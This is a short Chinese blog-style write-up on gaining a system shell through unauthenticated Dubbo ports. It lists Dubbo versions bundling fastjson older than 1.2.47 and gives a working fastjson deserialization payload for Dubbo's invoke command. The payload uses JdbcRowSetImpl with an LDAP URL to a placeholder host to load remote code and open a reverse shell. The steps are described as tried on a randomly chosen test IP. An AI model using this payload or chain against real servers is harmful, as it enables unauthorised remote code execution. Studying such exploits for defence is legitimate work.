学习大佬@cfhb的Dubbo服务对外暴露端口的安全风险文章,思路很NB,通过未授权链接dubbo,用Invoke构造fastJosn POC  跟随大佬的脚步(踩在巨人的肩膀),查下了github的dubbo版本的fastjson版本配置

2.7.0<=2.7.3
2.6.0<=2.6.7
2.5.x 所有

以上fastjson的默认版本都低于1.2.47,所以构造fastjson POC反弹shell就简单多了

随机找一个测试IP

《dubbo未授权访问构造fastjson获取系统shell》

直接插入invoke fastjson POC (和fastjson利用过程一样 1.开启web服务 2.ladp配置 3.监听端口)

fastjson <=1.2.47 POC

invoke com.google.testfastjson(“aa”,{“name”:{“@type”:”java.lang.Class”,”val”:”com.sun.rowset.JdbcRowSetImpl”},”x”:{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”ldap://x.x.x.x/Exploit”,”autoCommit”:true}}, “poc”:11})

《dubbo未授权访问构造fastjson获取系统shell》

看反弹结果

《dubbo未授权访问构造fastjson获取系统shell》

 

利用没有难处,还是大佬的思路的NB,感谢大佬思路分享@cfhb